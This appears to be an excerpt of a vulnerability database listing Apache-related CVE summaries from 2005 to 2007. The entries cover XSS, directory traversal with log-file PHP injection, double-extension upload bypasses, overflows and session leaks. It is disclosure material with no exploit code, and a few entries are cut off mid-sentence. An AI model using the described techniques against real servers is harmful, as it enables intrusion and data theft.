| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
5468| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
5469| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
5470| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
5471| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
5472| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5473| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
5474| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
5475| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
5476| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
5477| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
5478| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
5479| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
5480| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
5481| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
5482| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
5483| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
5484| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
5485| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
5486| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5487| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
5488| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
5489| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
5490| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
5491| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
5492| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
5493| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
5494| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
5495| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5496| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in Welcome web-app.
5497| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
5498| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
5499| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
5500| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
5501| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5502| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
5503| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5504| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
5505| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
5506| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5507| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
5508| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
5509| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
5510| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
5511| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
5512| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
5513| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
5514| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
5515| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5516| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
5517| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
5518| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
5519| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
5520| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
5521| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
5522| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
5523| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
5524| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
5525| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
5526| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
5527| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
5528| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
5529| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
5530| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
5531| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
5532| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
5533| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
5534| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
5535| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
5536| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
5537| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
5538| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
5539| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
5540| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
5541| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allow remote attackers to execute arbitrary code via various vectors, including the username.
5542| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
5543| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers to cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
5544| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
5545| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
5546| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
5547| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
5548| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
